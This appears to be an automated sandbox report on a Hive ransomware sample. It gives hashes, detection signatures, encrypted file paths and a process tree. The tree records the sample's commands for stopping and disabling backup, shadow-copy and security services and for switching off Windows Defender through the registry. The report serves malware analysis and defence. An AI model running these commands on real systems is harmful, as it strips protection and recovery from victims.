Analysis
-
max time kernel
144s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
03-03-2024 10:02
Behavioral task
behavioral1
Sample
211xahcou.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Hive.elf
Resource
win7-20240220-en
Behavioral task
behavioral3
Sample
hive.exe
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
hive_linux_elf
Resource
win7-20240221-en
Behavioral task
behavioral5
Sample
linux_hive.elf
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
sjl8j6ap3.exe
Resource
win7-20240221-en
Behavioral task
behavioral7
Sample
windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
Resource
win7-20240221-en
General
-
Target
zi1ysv64h.exe
-
Size
3.3MB
-
MD5
5384c6825a5707241c11d78529dbbfee
-
SHA1
85f5587e8ad534c2e5de0e72450b61ebda93e4fd
-
SHA256
3858e95bcf18c692f8321e3f8380c39684edb90bb622f37911144950602cea21
-
SHA512
856861295efb9c1b0000b369297cf6905a277c2d7dd0bc238f3884cd22598055450bf0459d68441f135bb77150685a86707ea9320a37e10548b40185f09b961f
-
SSDEEP
49152:HJ9mQ5uetkErb/TKvO90dL3BmAFd4A64nsfJ+9NRUMZXuPH9fc0KHPKG/g+eNgiz:HJ9jkl9NbBo9fc0KHYno
Malware Config
Extracted
C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\K8zJ_HOW_TO_DECRYPT.txt
hive
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid Process 2144 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Processes:
reg.exereg.exereg.exereg.exereg.exedescription ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exepid Process 1876 wevtutil.exe 2960 wevtutil.exe 980 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid Process 2364 bcdedit.exe 2372 bcdedit.exe -
Deletes itself 1 IoCs
Processes:
cmd.exepid Process 2296 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
zi1ysv64h.exedescription ioc Process File opened for modification C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Center.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_3y6jsIX2qsM0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_eXDholsTuEQ0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182689.JPG.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_IX81IKHPpYk0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO01063_.WMF.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_3UhCAw8YSmA0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01253_.GIF.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_64gBMFxGNbs0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\7-Zip\Lang\nn.txt.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_jpTS2a0IFas0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_zh_CN.jar.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_lDTc4_TM6ew0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Adak.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_z4EqBTAcXZw0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\COMBOBOX.JPG.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_aE7A-sWPgHQ0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue.css.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_ktZQXWjCVhM0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\BREAK.JPG.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_4ikNwi3hpqc0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile.html.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_p00xq6FcpsI0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\settings.html zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD06200_.WMF.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_fva5SkOIhYE0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\square.png zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME54.CSS.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_4c7xt-5KRr80.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR32B.GIF.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_ryyJmoeZVT00.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach_5.5.0.165303.jar.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_kFWKdnf3O5U0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_ja.jar.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_MXAm_eYdF0M0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+11.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_gi8Lm7tBScw0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107724.WMF.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_Z9u6I2Awmy40.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\J0143748.GIF.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_g0bnbgwEY6A0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\picturePuzzle.html zi1ysv64h.exe File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ECLIPSE\K8zJ_HOW_TO_DECRYPT.txt zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services.nl_ja_4.4.0.v20140623020002.jar.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_kEZWbKKxCjI0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_it.properties.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_f95FgAthmeg0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\es-ES\TipRes.dll.mui zi1ysv64h.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\fr-FR\css\RSSFeeds.css zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\CALENDAR.GIF.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_bQ1quAK34HQ0.2o4xo zi1ysv64h.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\K8zJ_HOW_TO_DECRYPT.txt zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Spelling.api.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_XErXRdWTd-w0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Puerto_Rico.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_VzH7zvOlIKM0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Auckland.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_mtTakCNmld00.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Windows Media Player\en-US\wmpnssci.dll.mui zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring-fallback.jar.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_uJtGN61PHW80.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\LISTS\1033\TIME.XML.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_oSRzrtS1Kg80.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Slipstream.xml.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_lwQfq5LEnzw0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21313_.GIF.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_zMPln5DDyYw0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierCloseButton.jpg.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_wRcd9F8NGJo0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectToolsetIconImagesMask.bmp.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_TEzRRS5qk6U0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_tS1gASyV4zI0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.properties.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_OWODnGuaV0E0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-progress.xml.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_BaO6id7Ake00.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\css\flyout.css zi1ysv64h.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Pohnpei.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_fdoqK-qt3ik0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\background.gif.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_aqDOoOOdSns0.2o4xo zi1ysv64h.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\K8zJ_HOW_TO_DECRYPT.txt zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_VelvetRose.gif.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_8XpbNopnRE40.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Windows Media Player\de-DE\setup_wm.exe.mui zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\de-DE\sbdrop.dll.mui zi1ysv64h.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\vlc.mo.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_lel7dsJJEbc0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\it-IT\js\library.js zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0251925.WMF.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_AXoO9d7HRrc0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0285796.WMF.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_yzUqbp-oiAg0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SpringGreen\TAB_ON.GIF.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_187_uw34bLU0.2o4xo zi1ysv64h.exe File created C:\Program Files\Microsoft Games\Chess\ja-JP\K8zJ_HOW_TO_DECRYPT.txt zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Funafuti.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_TmGoCV-KeZw0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_ja.jar.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_RkMY95CZoRc0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Palmer.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_kWEN9hX7e780.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21427_.GIF.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_eVZV6_9F3s80.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL058.XML.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_2sou_1WTRfA0.2o4xo zi1ysv64h.exe File created C:\Program Files\Microsoft Games\Chess\de-DE\K8zJ_HOW_TO_DECRYPT.txt zi1ysv64h.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\vlc.mo.qgXkDg3nTea1wyeip6BjRSSidTP9J_GWo1kSSWEQ7e3_aPYCkdvDg_40.2o4xo zi1ysv64h.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid Process 2680 sc.exe 2608 sc.exe 2696 sc.exe 2456 sc.exe 2516 sc.exe 2908 sc.exe 2156 sc.exe 1872 sc.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid Process 1324 vssadmin.exe -
Opens file in notepad (likely ransom note) 2 IoCs
Processes:
NOTEPAD.EXEnotepad.exepid Process 2500 NOTEPAD.EXE 2088 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exezi1ysv64h.exepid Process 2944 powershell.exe 2568 powershell.exe 2872 zi1ysv64h.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid Process Token: SeSecurityPrivilege 980 wevtutil.exe Token: SeBackupPrivilege 980 wevtutil.exe Token: SeSecurityPrivilege 1876 wevtutil.exe Token: SeBackupPrivilege 1876 wevtutil.exe Token: SeSecurityPrivilege 2960 wevtutil.exe Token: SeBackupPrivilege 2960 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1052 wmic.exe Token: SeSecurityPrivilege 1052 wmic.exe Token: SeTakeOwnershipPrivilege 1052 wmic.exe Token: SeLoadDriverPrivilege 1052 wmic.exe Token: SeSystemProfilePrivilege 1052 wmic.exe Token: SeSystemtimePrivilege 1052 wmic.exe Token: SeProfSingleProcessPrivilege 1052 wmic.exe Token: SeIncBasePriorityPrivilege 1052 wmic.exe Token: SeCreatePagefilePrivilege 1052 wmic.exe Token: SeBackupPrivilege 1052 wmic.exe Token: SeRestorePrivilege 1052 wmic.exe Token: SeShutdownPrivilege 1052 wmic.exe Token: SeDebugPrivilege 1052 wmic.exe Token: SeSystemEnvironmentPrivilege 1052 wmic.exe Token: SeRemoteShutdownPrivilege 1052 wmic.exe Token: SeUndockPrivilege 1052 wmic.exe Token: SeManageVolumePrivilege 1052 wmic.exe Token: 33 1052 wmic.exe Token: 34 1052 wmic.exe Token: 35 1052 wmic.exe Token: SeIncreaseQuotaPrivilege 2340 wmic.exe Token: SeSecurityPrivilege 2340 wmic.exe Token: SeTakeOwnershipPrivilege 2340 wmic.exe Token: SeLoadDriverPrivilege 2340 wmic.exe Token: SeSystemProfilePrivilege 2340 wmic.exe Token: SeSystemtimePrivilege 2340 wmic.exe Token: SeProfSingleProcessPrivilege 2340 wmic.exe Token: SeIncBasePriorityPrivilege 2340 wmic.exe Token: SeCreatePagefilePrivilege 2340 wmic.exe Token: SeBackupPrivilege 2340 wmic.exe Token: SeRestorePrivilege 2340 wmic.exe Token: SeShutdownPrivilege 2340 wmic.exe Token: SeDebugPrivilege 2340 wmic.exe Token: SeSystemEnvironmentPrivilege 2340 wmic.exe Token: SeRemoteShutdownPrivilege 2340 wmic.exe Token: SeUndockPrivilege 2340 wmic.exe Token: SeManageVolumePrivilege 2340 wmic.exe Token: 33 2340 wmic.exe Token: 34 2340 wmic.exe Token: 35 2340 wmic.exe Token: SeIncreaseQuotaPrivilege 2340 wmic.exe Token: SeSecurityPrivilege 2340 wmic.exe Token: SeTakeOwnershipPrivilege 2340 wmic.exe Token: SeLoadDriverPrivilege 2340 wmic.exe Token: SeSystemProfilePrivilege 2340 wmic.exe Token: SeSystemtimePrivilege 2340 wmic.exe Token: SeProfSingleProcessPrivilege 2340 wmic.exe Token: SeIncBasePriorityPrivilege 2340 wmic.exe Token: SeCreatePagefilePrivilege 2340 wmic.exe Token: SeBackupPrivilege 2340 wmic.exe Token: SeRestorePrivilege 2340 wmic.exe Token: SeShutdownPrivilege 2340 wmic.exe Token: SeDebugPrivilege 2340 wmic.exe Token: SeSystemEnvironmentPrivilege 2340 wmic.exe Token: SeRemoteShutdownPrivilege 2340 wmic.exe Token: SeUndockPrivilege 2340 wmic.exe Token: SeManageVolumePrivilege 2340 wmic.exe Token: 33 2340 wmic.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
notepad.exepid Process 2088 notepad.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
zi1ysv64h.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid Process procid_target PID 2872 wrote to memory of 2080 2872 zi1ysv64h.exe 29 PID 2872 wrote to memory of 2080 2872 zi1ysv64h.exe 29 PID 2872 wrote to memory of 2080 2872 zi1ysv64h.exe 29 PID 2080 wrote to memory of 1984 2080 net.exe 31 PID 2080 wrote to memory of 1984 2080 net.exe 31 PID 2080 wrote to memory of 1984 2080 net.exe 31 PID 2872 wrote to memory of 3024 2872 zi1ysv64h.exe 32 PID 2872 wrote to memory of 3024 2872 zi1ysv64h.exe 32 PID 2872 wrote to memory of 3024 2872 zi1ysv64h.exe 32 PID 3024 wrote to memory of 2052 3024 net.exe 34 PID 3024 wrote to memory of 2052 3024 net.exe 34 PID 3024 wrote to memory of 2052 3024 net.exe 34 PID 2872 wrote to memory of 2588 2872 zi1ysv64h.exe 35 PID 2872 wrote to memory of 2588 2872 zi1ysv64h.exe 35 PID 2872 wrote to memory of 2588 2872 zi1ysv64h.exe 35 PID 2588 wrote to memory of 2656 2588 net.exe 37 PID 2588 wrote to memory of 2656 2588 net.exe 37 PID 2588 wrote to memory of 2656 2588 net.exe 37 PID 2872 wrote to memory of 2700 2872 zi1ysv64h.exe 38 PID 2872 wrote to memory of 2700 2872 zi1ysv64h.exe 38 PID 2872 wrote to memory of 2700 2872 zi1ysv64h.exe 38 PID 2700 wrote to memory of 2648 2700 net.exe 40 PID 2700 wrote to memory of 2648 2700 net.exe 40 PID 2700 wrote to memory of 2648 2700 net.exe 40 PID 2872 wrote to memory of 2600 2872 zi1ysv64h.exe 41 PID 2872 wrote to memory of 2600 2872 zi1ysv64h.exe 41 PID 2872 wrote to memory of 2600 2872 zi1ysv64h.exe 41 PID 2600 wrote to memory of 2716 2600 net.exe 43 PID 2600 wrote to memory of 2716 2600 net.exe 43 PID 2600 wrote to memory of 2716 2600 net.exe 43 PID 2872 wrote to memory of 2748 2872 zi1ysv64h.exe 44 PID 2872 wrote to memory of 2748 2872 zi1ysv64h.exe 44 PID 2872 wrote to memory of 2748 2872 zi1ysv64h.exe 44 PID 2748 wrote to memory of 2816 2748 net.exe 46 PID 2748 wrote to memory of 2816 2748 net.exe 46 PID 2748 wrote to memory of 2816 2748 net.exe 46 PID 2872 wrote to memory of 2560 2872 zi1ysv64h.exe 47 PID 2872 wrote to memory of 2560 2872 zi1ysv64h.exe 47 PID 2872 wrote to memory of 2560 2872 zi1ysv64h.exe 47 PID 2560 wrote to memory of 1744 2560 net.exe 49 PID 2560 wrote to memory of 1744 2560 net.exe 49 PID 2560 wrote to memory of 1744 2560 net.exe 49 PID 2872 wrote to memory of 2760 2872 zi1ysv64h.exe 50 PID 2872 wrote to memory of 2760 2872 zi1ysv64h.exe 50 PID 2872 wrote to memory of 2760 2872 zi1ysv64h.exe 50 PID 2760 wrote to memory of 2948 2760 net.exe 52 PID 2760 wrote to memory of 2948 2760 net.exe 52 PID 2760 wrote to memory of 2948 2760 net.exe 52 PID 2872 wrote to memory of 2608 2872 zi1ysv64h.exe 53 PID 2872 wrote to memory of 2608 2872 zi1ysv64h.exe 53 PID 2872 wrote to memory of 2608 2872 zi1ysv64h.exe 53 PID 2872 wrote to memory of 2696 2872 zi1ysv64h.exe 55 PID 2872 wrote to memory of 2696 2872 zi1ysv64h.exe 55 PID 2872 wrote to memory of 2696 2872 zi1ysv64h.exe 55 PID 2872 wrote to memory of 2456 2872 zi1ysv64h.exe 57 PID 2872 wrote to memory of 2456 2872 zi1ysv64h.exe 57 PID 2872 wrote to memory of 2456 2872 zi1ysv64h.exe 57 PID 2872 wrote to memory of 2516 2872 zi1ysv64h.exe 59 PID 2872 wrote to memory of 2516 2872 zi1ysv64h.exe 59 PID 2872 wrote to memory of 2516 2872 zi1ysv64h.exe 59 PID 2872 wrote to memory of 2908 2872 zi1ysv64h.exe 61 PID 2872 wrote to memory of 2908 2872 zi1ysv64h.exe 61 PID 2872 wrote to memory of 2908 2872 zi1ysv64h.exe 61 PID 2872 wrote to memory of 2156 2872 zi1ysv64h.exe 63 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\zi1ysv64h.exe"C:\Users\Admin\AppData\Local\Temp\zi1ysv64h.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:1984
-
-
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:2052
-
-
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:2656
-
-
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:2648
-
-
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:2716
-
-
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:2816
-
-
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1744
-
-
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:2948
-
-
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵
- Launches sc.exe
PID:2608
-
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
PID:2696
-
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
PID:2456
-
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
PID:2516
-
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵
- Launches sc.exe
PID:2908
-
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
PID:2156
-
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
PID:1872
-
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
PID:2680
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2772
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:2624
-
-
